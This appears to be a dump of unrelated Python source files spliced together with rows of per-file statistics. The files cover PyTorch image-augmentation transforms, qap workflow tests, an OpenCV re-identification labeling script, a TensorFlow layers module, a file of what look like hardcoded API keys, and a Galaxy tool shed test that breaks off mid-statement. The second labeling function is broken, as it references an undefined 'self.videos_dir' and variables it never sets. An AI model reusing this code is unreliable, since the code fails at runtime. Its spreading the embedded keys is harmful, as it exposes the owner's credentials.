interp = self.interp
tx = self.height_range * inputs[0].size(1)
ty = self.width_range * inputs[0].size(2)
translation_matrix = th.FloatTensor([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
if self.lazy:
return translation_matrix
else:
outputs = []
for idx, _input in enumerate(inputs):
input_tf = th_affine2d(_input,
translation_matrix,
mode=interp[idx],
center=True)
outputs.append(input_tf)
return outputs if idx > 1 else outputs[0]
class RandomShear(object):
def __init__(self,
shear_range,
interp='bilinear',
lazy=False):
"""
Randomly shear an image with radians (-shear_range, shear_range)
Arguments
---------
shear_range : float
radian bounds on the shear transform
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if false, perform the transform on the tensor and return the tensor
if true, only create the affine transform matrix and return that
"""
self.shear_range = shear_range
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
shear = random.uniform(-self.shear_range, self.shear_range)
if self.lazy:
return Shear(shear,
lazy=True)(inputs[0])
else:
outputs = Shear(shear,
interp=self.interp)(*inputs)
return outputs
class RandomChoiceShear(object):
def __init__(self,
values,
p=None,
interp='bilinear',
lazy=False):
"""
Randomly shear an image with a value sampled from a list of values.
Arguments
---------
values : a list or tuple
the values from which the rotation value will be sampled
p : a list or tuple the same length as `values`
the probabilities of sampling any given value. Must sum to 1.
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if false, perform the transform on the tensor and return the tensor
if true, only create the affine transform matrix and return that
"""
if isinstance(values, (list, tuple)):
values = th.FloatTensor(values)
self.values = values
if p is None:
p = th.ones(len(values)) / len(values)
else:
if abs(1.0-sum(p)) > 1e-3:
raise ValueError('Probs must sum to 1')
self.p = p
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
shear = th_random_choice(self.values, p=self.p)
if self.lazy:
return Shear(shear,
lazy=True)(inputs[0])
else:
outputs = Shear(shear,
interp=self.interp)(*inputs)
return outputs
class Shear(object):
def __init__(self,
value,
interp='bilinear',
lazy=False):
self.value = value
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
if not isinstance(self.interp, (tuple,list)):
interp = [self.interp]*len(inputs)
else:
interp = self.interp
theta = (math.pi * self.value) / 180
shear_matrix = th.FloatTensor([[1, -math.sin(theta), 0],
[0, math.cos(theta), 0],
[0, 0, 1]])
if self.lazy:
return shear_matrix
else:
outputs = []
for idx, _input in enumerate(inputs):
input_tf = th_affine2d(_input,
shear_matrix,
mode=interp[idx],
center=True)
outputs.append(input_tf)
return outputs if idx > 1 else outputs[0]
class RandomZoom(object):
def __init__(self,
zoom_range,
interp='bilinear',
lazy=False):
"""
Randomly zoom in and/or out on an image
Arguments
---------
zoom_range : tuple or list with 2 values, both between (0, infinity)
lower and upper bounds on percent zoom.
Anything less than 1.0 will zoom in on the image,
anything greater than 1.0 will zoom out on the image.
e.g. (0.7, 1.0) will only zoom in,
(1.0, 1.4) will only zoom out,
(0.7, 1.4) will randomly zoom in or out
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if false, perform the transform on the tensor and return the tensor
if true, only create the affine transform matrix and return that
"""
if not isinstance(zoom_range, list) and not isinstance(zoom_range, tuple):
raise ValueError('zoom_range must be tuple or list with 2 values')
self.zoom_range = zoom_range
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
zx = random.uniform(self.zoom_range[0], self.zoom_range[1])
zy = random.uniform(self.zoom_range[0], self.zoom_range[1])
if self.lazy:
return Zoom([zx, zy], lazy=True)(inputs[0])
else:
outputs = Zoom([zx, zy],
interp=self.interp)(*inputs)
return outputs
class RandomChoiceZoom(object):
def __init__(self,
values,
p=None,
interp='bilinear',
lazy=False):
"""
Randomly zoom in and/or out on an image with a value sampled from
a list of values
Arguments
---------
values : a list or tuple
the values from which the applied zoom value will be sampled
p : a list or tuple the same length as `values`
the probabilities of sampling any given value. Must sum to 1.
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if false, perform the transform on the tensor and return the tensor
if true, only create the affine transform matrix and return that
"""
if isinstance(values, (list, tuple)):
values = th.FloatTensor(values)
self.values = values
if p is None:
p = th.ones(len(values)) / len(values)
else:
if abs(1.0-sum(p)) > 1e-3:
raise ValueError('Probs must sum to 1')
self.p = p
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
zx = th_random_choice(self.values, p=self.p)
zy = th_random_choice(self.values, p=self.p)
if self.lazy:
return Zoom([zx, zy], lazy=True)(inputs[0])
else:
outputs = Zoom([zx, zy],
interp=self.interp)(*inputs)
return outputs
class Zoom(object):
def __init__(self,
value,
interp='bilinear',
lazy=False):
"""
Arguments
---------
value : float
Fractional zoom.
=1 : no zoom
>1 : zoom-in (value-1)%
<1 : zoom-out (1-value)%
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy: boolean
If true, just return transformed
"""
if not isinstance(value, (tuple,list)):
value = (value, value)
self.value = value
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
if not isinstance(self.interp, (tuple,list)):
interp = [self.interp]*len(inputs)
else:
interp = self.interp
zx, zy = self.value
zoom_matrix = th.FloatTensor([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
if self.lazy:
return zoom_matrix
else:
outputs = []
for idx, _input in enumerate(inputs):
input_tf = th_affine2d(_input,
zoom_matrix,
mode=interp[idx],
center=True)
outputs.append(input_tf)
return outputs if idx > 1 else outputs[0]
| 35.19401
| 83
| 0.548041
| 3,126
| 27,029
| 4.646193
| 0.071657
| 0.028918
| 0.036629
| 0.017557
| 0.804186
| 0.793721
| 0.769141
| 0.762875
| 0.756472
| 0.741394
| 0
| 0.009963
| 0.372452
| 27,029
| 767
| 84
| 35.239896
| 0.846304
| 0.385475
| 0
| 0.75
| 0
| 0
| 0.02428
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078947
| false
| 0
| 0.010526
| 0
| 0.202632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a39029e1c41bb53bfbeaf78210abb20677c45fd
| 5,125
|
py
|
Python
|
qap/test_qap_workflows.py
|
manwithadodla/quality-assessment-protocol
|
9f4d660bd67eb20d4b4a28ae7e837e6d396f0318
|
[
"BSD-3-Clause"
] | 38
|
2015-01-23T20:07:22.000Z
|
2021-11-08T07:08:27.000Z
|
qap/test_qap_workflows.py
|
manwithadodla/quality-assessment-protocol
|
9f4d660bd67eb20d4b4a28ae7e837e6d396f0318
|
[
"BSD-3-Clause"
] | 107
|
2015-01-09T00:34:34.000Z
|
2022-02-28T07:44:10.000Z
|
qap/test_qap_workflows.py
|
manwithadodla/quality-assessment-protocol
|
9f4d660bd67eb20d4b4a28ae7e837e6d396f0318
|
[
"BSD-3-Clause"
] | 24
|
2015-09-14T16:11:12.000Z
|
2021-10-04T08:09:16.000Z
|
import pytest
test_sub_dir = "test_data"
@pytest.mark.quick
def test_run_everything_qap_anatomical_spatial_workflow_graph():
# this tests the workflow builder, not the end results (these have their
# own unit tests)
import os
import shutil
import pkg_resources as p
from qap.qap_workflows import run_everything_qap_anatomical_spatial
anatomical_scan = p.resource_filename("qap", os.path.join(test_sub_dir, \
"anatomical_scan.nii.gz"))
template_head = p.resource_filename("qap", os.path.join(test_sub_dir, \
"MNI152_T1_3mm.nii.gz"))
ref_graph = p.resource_filename("qap", os.path.join(test_sub_dir, \
"anatomical_spatial_graph.dot"))
out_dir = os.path.join(os.getcwd(), "unit_tests_qap_workflows")
out_workflow = run_everything_qap_anatomical_spatial(anatomical_scan, \
template_head, \
"participant_1",
out_dir=out_dir, \
run=False)
out_workflow_obj = out_workflow[0]
out_workflow_dir = out_workflow[1]
# write the dependency graph of the workflow we are testing
out_graph = os.path.join(out_workflow_dir, "graph.dot")
out_workflow_obj.write_graph(dotfilename=out_graph, simple_form=False)
# load the both the reference and the to-test dependency graphs
with open(ref_graph,"r") as f:
ref_graph_lines = sorted(f.readlines())
with open(out_graph,"r") as f:
out_graph_lines = sorted(f.readlines())
try:
shutil.rmtree(out_dir)
except:
pass
assert ref_graph_lines == out_graph_lines
@pytest.mark.quick
def test_run_everything_qap_functional_spatial_workflow_graph():
# this tests the workflow builder, not the end results (these have their
# own unit tests)
import os
import shutil
import pkg_resources as p
from qap.qap_workflows import run_everything_qap_functional_spatial
functional_scan = p.resource_filename("qap", os.path.join(test_sub_dir, \
"functional_scan.nii.gz"))
ref_graph = p.resource_filename("qap", os.path.join(test_sub_dir, \
"functional_spatial_graph.dot"))
out_dir = os.path.join(os.getcwd(), "unit_tests_qap_workflows")
out_workflow = run_everything_qap_functional_spatial(functional_scan, \
"participant_1",
out_dir=out_dir, \
run=False)
out_workflow_obj = out_workflow[0]
out_workflow_dir = out_workflow[1]
# write the dependency graph of the workflow we are testing
out_graph = os.path.join(out_workflow_dir, "graph.dot")
out_workflow_obj.write_graph(dotfilename=out_graph, simple_form=False)
# load the both the reference and the to-test dependency graphs
with open(ref_graph,"r") as f:
ref_graph_lines = sorted(f.readlines())
with open(out_graph,"r") as f:
out_graph_lines = sorted(f.readlines())
try:
shutil.rmtree(out_dir)
except:
pass
assert ref_graph_lines == out_graph_lines
@pytest.mark.quick
def test_run_everything_qap_functional_temporal_workflow_graph():
# this tests the workflow builder, not the end results (these have their
# own unit tests)
import os
import numpy as np
import nibabel as nb
import shutil
import pkg_resources as p
from qap.qap_workflows import run_everything_qap_functional_temporal
functional_scan = p.resource_filename("qap", os.path.join(test_sub_dir, \
"functional_scan.nii.gz"))
ref_graph = p.resource_filename("qap", os.path.join(test_sub_dir, \
"functional_temporal_graph.dot"))
out_dir = os.path.join(os.getcwd(), "unit_tests_qap_workflows")
out_workflow = run_everything_qap_functional_temporal(functional_scan, \
"participant_1",
out_dir=out_dir, \
run=False)
out_workflow_obj = out_workflow[0]
out_workflow_dir = out_workflow[1]
# write the dependency graph of the workflow we are testing
out_graph = os.path.join(out_workflow_dir, "graph.dot")
out_workflow_obj.write_graph(dotfilename=out_graph, simple_form=False)
# load the both the reference and the to-test dependency graphs
with open(ref_graph,"r") as f:
ref_graph_lines = sorted(f.readlines())
with open(out_graph,"r") as f:
out_graph_lines = sorted(f.readlines())
try:
shutil.rmtree(out_dir)
except:
pass
assert ref_graph_lines == out_graph_lines
| 33.940397
| 77
| 0.609366
| 634
| 5,125
| 4.616719
| 0.141956
| 0.07892
| 0.044414
| 0.047831
| 0.963102
| 0.956953
| 0.956953
| 0.926888
| 0.913905
| 0.913905
| 0
| 0.003984
| 0.314341
| 5,125
| 150
| 78
| 34.166667
| 0.82897
| 0.120976
| 0
| 0.769231
| 0
| 0
| 0.07682
| 0.049655
| 0
| 0
| 0
| 0
| 0.032967
| 1
| 0.032967
| false
| 0.032967
| 0.164835
| 0
| 0.197802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a3e908ee0789e5e64a8a1ead4991a875b71f7a9
| 7,871
|
py
|
Python
|
Source/LoadImagePrintText.py
|
Farious/PersonTracker
|
0ce45211e8e00cc573c60a6cd00d46bbddaa2256
|
[
"Apache-2.0"
] | 1
|
2017-11-13T12:41:58.000Z
|
2017-11-13T12:41:58.000Z
|
Source/LoadImagePrintText.py
|
Farious/PersonTracker
|
0ce45211e8e00cc573c60a6cd00d46bbddaa2256
|
[
"Apache-2.0"
] | null | null | null |
Source/LoadImagePrintText.py
|
Farious/PersonTracker
|
0ce45211e8e00cc573c60a6cd00d46bbddaa2256
|
[
"Apache-2.0"
] | null | null | null |
import cv2
def loadImagePrintTextBKP(cam, frame, debugREID=1, showPD=1, debugPD=0, PDthreshold=-1):
"""
:param cam:
:param frame:
:param debugREID:
"""
## Pre-defined static variables
CV_FILLED = -1
red = (0, 0, 255)
green = (0, 255, 0)
black = (0, 0, 0)
white = (255, 255, 255)
thickness = 8
if cam == 60:
fontScale = 2 # 2 for Camera 60 (4MPixel), 1 for other cameras (1MPixel)
else:
fontScale = 1
textHeight = 25 * fontScale # 50 for cv2.FONT_HERSHEY_DUPLEX in cam60 image sizes
letterWidth = 18 * fontScale
smalltextHeight = 16 * fontScale # 50 for cv2.FONT_HERSHEY_DUPLEX in cam60 image sizes
smallletterWidth = 13 * fontScale
JPEGspath = "RESOURCES\JPEG\camera" + str(cam) + "\\"
filename = "I" + str(frame).zfill(5) + ".jpeg"
image = cv2.imread(JPEGspath + filename)
if showPD == 0: # Don't print anything in image, just return the RAW
return image
detectionsPath = ".\RESOURCES\Detections\camera" + str(cam) + "\\"
detectionFile = "I" + str(frame).zfill(5) + ".txt"
fileText = open(detectionsPath + detectionFile, 'r')
lines = fileText.readlines()
fileText.close()
res1 = [line.rstrip('\n').split(',') for line in lines]
for i, values in enumerate(res1):
res1[i] = [float(value) for value in values]
left = int(res1[i][0])
top = int(res1[i][1])
right = left + int(res1[i][2])
bottom = top + int(res1[i][3])
confidence = res1[i][4]
if confidence < PDthreshold: # Don't print anything, neither detection or RE-ID
return image
confidence = str(confidence)
## Coordinate frame is (x,y) starting at top-left corner
## cv2.rectangle(img, pt1, pt2, color[, thickness[, lineType[, shift]]])
cv2.rectangle(image, (left, top), (right, bottom), red, thickness)
if debugPD:
cv2.rectangle(image, (left, bottom),
(left + smallletterWidth * len(confidence), bottom + smalltextHeight + fontScale), white,
CV_FILLED)
cv2.putText(image, confidence, (left, bottom + smalltextHeight), cv2.FONT_HERSHEY_COMPLEX_SMALL, fontScale,
color=black, thickness=thickness / 2)
if len(res1[i]) > 5: # There is a re-IDentification for this detection
correctID = int(res1[i][5])
REIDs = [int(value) for value in res1[i][6:]]
## Given a list of names, put one white box for each, on top of the image, and print the text on each respective
# whitebox
# Standard person names are PersonXXX
texts = [str(k + 1) + ".Person" + str(ID).zfill(3) for k, ID in enumerate(REIDs)]
# But for a few select persons that we do know their first name, we can re-name the text to their names
# It would probably be nicer if made in a single cycle
for k, ID in enumerate(REIDs):
if ID == 22:
texts[k] = str(k + 1) + ".Matteo"
if ID == 32:
texts[k] = str(k + 1) + ".Dario"
for k, ID in enumerate(REIDs):
text = texts[k]
j = k
# in thickness CV_FILLED is -1
# +fontScale to give a little white margin on the bottom
cv2.rectangle(image, (left, top - textHeight * j + fontScale),
(left + letterWidth * len(text), top - textHeight * (j + 1)), white, CV_FILLED)
if ID == correctID:
color = green
else:
color = red
if debugREID == 0:
color = black
cv2.putText(image, text, (left, top - textHeight * j), cv2.FONT_HERSHEY_DUPLEX, fontScale, color,
thickness=thickness / 2)
def loadImagePrintText(cam, frame, id_list = [], debugREID=1, showPD=1, debugPD=0, PDthreshold=-1):
"""
:param cam:
:param frame:
:param debugREID:
"""
## Pre-defined static variables
CV_FILLED = -1
red = (0, 0, 255)
green = (0, 255, 0)
black = (0, 0, 0)
white = (255, 255, 255)
thickness = 8
if cam == 60:
fontScale = 2 # 2 for Camera 60 (4MPixel), 1 for other cameras (1MPixel)
else:
fontScale = 1
textHeight = 25 * fontScale # 50 for cv2.FONT_HERSHEY_DUPLEX in cam60 image sizes
letterWidth = 18 * fontScale
smalltextHeight = 16 * fontScale # 50 for cv2.FONT_HERSHEY_DUPLEX in cam60 image sizes
smallletterWidth = 13 * fontScale
file_path = join(self.videos_dir, cam, frame + ".jpeg")
image = cv2.imread(JPEGspath + filename)
if showPD == 0: # Don't print anything in image, just return the RAW
return image
detectionsPath = ".\RESOURCES\Detections\camera" + str(cam) + "\\"
detectionFile = "I" + str(frame).zfill(5) + ".txt"
fileText = open(detectionsPath + detectionFile, 'r')
lines = fileText.readlines()
fileText.close()
res1 = [line.rstrip('\n').split(',') for line in lines]
for i, values in enumerate(res1):
res1[i] = [float(value) for value in values]
left = int(res1[i][0])
top = int(res1[i][1])
right = left + int(res1[i][2])
bottom = top + int(res1[i][3])
confidence = res1[i][4]
if confidence < PDthreshold: # Don't print anything, neither detection or RE-ID
return image
confidence = str(confidence)
## Coordinate frame is (x,y) starting at top-left corner
## cv2.rectangle(img, pt1, pt2, color[, thickness[, lineType[, shift]]])
cv2.rectangle(image, (left, top), (right, bottom), red, thickness)
if debugPD:
cv2.rectangle(image, (left, bottom),
(left + smallletterWidth * len(confidence), bottom + smalltextHeight + fontScale), white,
CV_FILLED)
cv2.putText(image, confidence, (left, bottom + smalltextHeight), cv2.FONT_HERSHEY_COMPLEX_SMALL, fontScale,
color=black, thickness=thickness / 2)
if len(res1[i]) > 5: # There is a re-IDentification for this detection
correctID = int(res1[i][5])
REIDs = [int(value) for value in res1[i][6:]]
## Given a list of names, put one white box for each, on top of the image, and print the text on each respective
# whitebox
# Standard person names are PersonXXX
texts = [str(k + 1) + ".Person" + str(ID).zfill(3) for k, ID in enumerate(REIDs)]
# But for a few select persons that we do know their first name, we can re-name the text to their names
# It would probably be nicer if made in a single cycle
for k, ID in enumerate(REIDs):
if ID == 22:
texts[k] = str(k + 1) + ".Matteo"
if ID == 32:
texts[k] = str(k + 1) + ".Dario"
for k, ID in enumerate(REIDs):
text = texts[k]
j = k
# in thickness CV_FILLED is -1
# +fontScale to give a little white margin on the bottom
cv2.rectangle(image, (left, top - textHeight * j + fontScale),
(left + letterWidth * len(text), top - textHeight * (j + 1)), white, CV_FILLED)
if ID == correctID:
color = green
else:
color = red
if debugREID == 0:
color = black
cv2.putText(image, text, (left, top - textHeight * j), cv2.FONT_HERSHEY_DUPLEX, fontScale, color,
thickness=thickness / 2)
return image
| 39.954315
| 124
| 0.553932
| 966
| 7,871
| 4.483437
| 0.188406
| 0.02078
| 0.018471
| 0.027707
| 0.962595
| 0.959132
| 0.959132
| 0.959132
| 0.959132
| 0.959132
| 0
| 0.038931
| 0.334265
| 7,871
| 196
| 125
| 40.158163
| 0.787595
| 0.228688
| 0
| 0.954198
| 0
| 0
| 0.025744
| 0.013206
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015267
| false
| 0
| 0.007634
| 0
| 0.061069
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a45314eb8ea61a2853d2e7065e3c984d7b3411e
| 2,440
|
py
|
Python
|
python3/lib/python3.6/site-packages/tensorflow/_api/v1/compat/v1/layers/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | 3
|
2020-10-12T15:47:01.000Z
|
2022-01-14T19:51:26.000Z
|
python3/lib/python3.6/site-packages/tensorflow/_api/v1/compat/v1/layers/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | null | null | null |
python3/lib/python3.6/site-packages/tensorflow/_api/v1/compat/v1/layers/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | 2
|
2020-08-03T13:02:06.000Z
|
2020-11-04T03:15:44.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.layers namespace.
"""
from __future__ import print_function as _print_function
from tensorflow._api.v1.compat.v1.layers import experimental
from tensorflow.python.keras.engine import InputSpec
from tensorflow.python.layers.base import Layer
from tensorflow.python.layers.convolutional import Conv1D
from tensorflow.python.layers.convolutional import Conv2D
from tensorflow.python.layers.convolutional import Conv2DTranspose
from tensorflow.python.layers.convolutional import Conv3D
from tensorflow.python.layers.convolutional import Conv3DTranspose
from tensorflow.python.layers.convolutional import SeparableConv1D
from tensorflow.python.layers.convolutional import SeparableConv2D
from tensorflow.python.layers.convolutional import conv1d
from tensorflow.python.layers.convolutional import conv2d
from tensorflow.python.layers.convolutional import conv2d_transpose
from tensorflow.python.layers.convolutional import conv3d
from tensorflow.python.layers.convolutional import conv3d_transpose
from tensorflow.python.layers.convolutional import separable_conv1d
from tensorflow.python.layers.convolutional import separable_conv2d
from tensorflow.python.layers.core import Dense
from tensorflow.python.layers.core import Dropout
from tensorflow.python.layers.core import Flatten
from tensorflow.python.layers.core import dense
from tensorflow.python.layers.core import dropout
from tensorflow.python.layers.core import flatten
from tensorflow.python.layers.layers import AveragePooling1D
from tensorflow.python.layers.layers import AveragePooling2D
from tensorflow.python.layers.layers import AveragePooling3D
from tensorflow.python.layers.layers import BatchNormalization
from tensorflow.python.layers.layers import MaxPooling1D
from tensorflow.python.layers.layers import MaxPooling2D
from tensorflow.python.layers.layers import MaxPooling3D
from tensorflow.python.layers.layers import average_pooling1d
from tensorflow.python.layers.layers import average_pooling2d
from tensorflow.python.layers.layers import average_pooling3d
from tensorflow.python.layers.layers import batch_normalization
from tensorflow.python.layers.layers import max_pooling1d
from tensorflow.python.layers.layers import max_pooling2d
from tensorflow.python.layers.layers import max_pooling3d
del _print_function
| 51.914894
| 82
| 0.872131
| 309
| 2,440
| 6.812298
| 0.210356
| 0.281235
| 0.342043
| 0.432304
| 0.749644
| 0.746793
| 0.571972
| 0.363895
| 0.363895
| 0.363895
| 0
| 0.012384
| 0.073361
| 2,440
| 46
| 83
| 53.043478
| 0.91862
| 0.066393
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.974359
| 0
| 0.974359
| 0.051282
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8ab875a2832201c1e15c76ec4a0d649fdc25f125
| 99
|
py
|
Python
|
api_key.py
|
nBuze/CanaBot
|
fe27136d5d39b99829db380f97a89b3a15a7694c
|
[
"MIT"
] | 1
|
2018-02-24T03:05:26.000Z
|
2018-02-24T03:05:26.000Z
|
api_key.py
|
nBuze/CanaBot
|
fe27136d5d39b99829db380f97a89b3a15a7694c
|
[
"MIT"
] | null | null | null |
api_key.py
|
nBuze/CanaBot
|
fe27136d5d39b99829db380f97a89b3a15a7694c
|
[
"MIT"
] | 1
|
2018-08-11T16:33:59.000Z
|
2018-08-11T16:33:59.000Z
|
LINGUISTIC = '297a35355ae64859b04b10d90cf43813'
TEXT_ANALYSIS = '02a6411250204d66b5fcb32dad085732'
| 33
| 50
| 0.878788
| 5
| 99
| 17.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.505376
| 0.060606
| 99
| 2
| 51
| 49.5
| 0.419355
| 0
| 0
| 0
| 0
| 0
| 0.646465
| 0.646465
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76d4bac6fbe6eab932f4991e6555ed8cabc605f8
| 126
|
py
|
Python
|
libs/supercell_resource_decoder/encoder_csv.py
|
fourjr/rw-data
|
8a767f60ffc169311939f701e6d266ed1d81cc9b
|
[
"MIT"
] | null | null | null |
libs/supercell_resource_decoder/encoder_csv.py
|
fourjr/rw-data
|
8a767f60ffc169311939f701e6d266ed1d81cc9b
|
[
"MIT"
] | null | null | null |
libs/supercell_resource_decoder/encoder_csv.py
|
fourjr/rw-data
|
8a767f60ffc169311939f701e6d266ed1d81cc9b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
from lib_csv import encode_file
from lib_csv import restore_file
encode_file(sys.argv[1])
| 15.75
| 32
| 0.801587
| 23
| 126
| 4.173913
| 0.608696
| 0.145833
| 0.208333
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018018
| 0.119048
| 126
| 7
| 33
| 18
| 0.846847
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76ee80fd9a7016a9ca3e312f6e6da9a429ccae80
| 30,760
|
py
|
Python
|
test/tool_shed/functional/test_1080_advanced_circular_dependency_installation.py
|
thata/galaxy-dist
|
6c3ffa064faf0c500f5594ed7b58ed839b00f337
|
[
"CC-BY-3.0"
] | 2
|
2016-02-23T00:09:14.000Z
|
2019-02-11T07:48:44.000Z
|
test/tool_shed/functional/test_1080_advanced_circular_dependency_installation.py
|
thata/galaxy-dist
|
6c3ffa064faf0c500f5594ed7b58ed839b00f337
|
[
"CC-BY-3.0"
] | null | null | null |
test/tool_shed/functional/test_1080_advanced_circular_dependency_installation.py
|
thata/galaxy-dist
|
6c3ffa064faf0c500f5594ed7b58ed839b00f337
|
[
"CC-BY-3.0"
] | 6
|
2015-05-27T13:09:50.000Z
|
2019-02-11T07:48:46.000Z
|
from tool_shed.base.twilltestcase import ShedTwillTestCase, common, os, logging
import tool_shed.base.test_db_util as test_db_util
column_repository_name = 'column_maker_0080'
column_repository_description = "Add column"
column_repository_long_description = "Compute an expression on every row"
convert_repository_name = 'convert_chars_0080'
convert_repository_description = "Convert delimiters"
convert_repository_long_description = "Convert delimiters to tab"
category_name = 'Test 0080 Advanced Circular Dependencies'
category_description = 'Test circular dependency features'
log = logging.getLogger( __name__ )
running_standalone = False
class TestRepositoryDependencies( ShedTwillTestCase ):
'''Testing uninstalling and reinstalling repository dependencies, and setting tool panel sections.'''
def test_0000_create_or_login_admin_user( self ):
"""Create necessary user accounts and login as an admin user."""
self.galaxy_logout()
self.galaxy_login( email=common.admin_email, username=common.admin_username )
galaxy_admin_user = test_db_util.get_galaxy_user( common.admin_email )
assert galaxy_admin_user is not None, 'Problem retrieving user with email %s from the database' % common.admin_email
galaxy_admin_user_private_role = test_db_util.get_galaxy_private_role( galaxy_admin_user )
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
test_user_1 = test_db_util.get_user( common.test_user_1_email )
assert test_user_1 is not None, 'Problem retrieving user with email %s from the database' % test_user_1_email
test_user_1_private_role = test_db_util.get_private_role( test_user_1 )
self.logout()
self.login( email=common.admin_email, username=common.admin_username )
admin_user = test_db_util.get_user( common.admin_email )
assert admin_user is not None, 'Problem retrieving user with email %s from the database' % admin_email
admin_user_private_role = test_db_util.get_private_role( admin_user )
def test_0005_create_and_populate_column_repository( self ):
"""Create the category for this test suite, then create and populate column_maker."""
category = self.create_category( name=category_name, description=category_description )
global running_standalone
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
repository = self.get_or_create_repository( name=column_repository_name,
description=column_repository_description,
long_description=column_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
if self.repository_is_new( repository ):
self.upload_file( repository,
'column_maker/column_maker.tar',
strings_displayed=[],
commit_message='Uploaded column_maker.tar.' )
running_standalone = True
def test_0010_create_and_populate_convert_repository( self ):
'''Create and populate the convert_chars repository.'''
global running_standalone
self.logout()
self.login( email=common.admin_email, username=common.admin_username )
category = self.create_category( name=category_name, description=category_description )
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
repository = self.get_or_create_repository( name=convert_repository_name,
description=convert_repository_description,
long_description=convert_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
if self.repository_is_new( repository ):
self.upload_file( repository,
'convert_chars/convert_chars.tar',
strings_displayed=[],
commit_message='Uploaded convert_chars.tar.' )
running_standalone = True
def test_0015_upload_dependency_xml_if_needed( self ):
'''If this test is being run by itself, it will not have repository dependencies configured yet.'''
global running_standalone
if running_standalone:
convert_repository = test_db_util.get_repository_by_name_and_owner( convert_repository_name, common.test_user_1_name )
column_repository = test_db_util.get_repository_by_name_and_owner( column_repository_name, common.test_user_1_name )
repository_dependencies_path = self.generate_temp_path( 'test_1080', additional_paths=[ 'convert' ] )
self.generate_repository_dependency_xml( [ convert_repository ],
self.get_filename( 'repository_dependencies.xml', filepath=repository_dependencies_path ),
dependency_description='Column maker depends on the convert repository.' )
self.upload_file( column_repository,
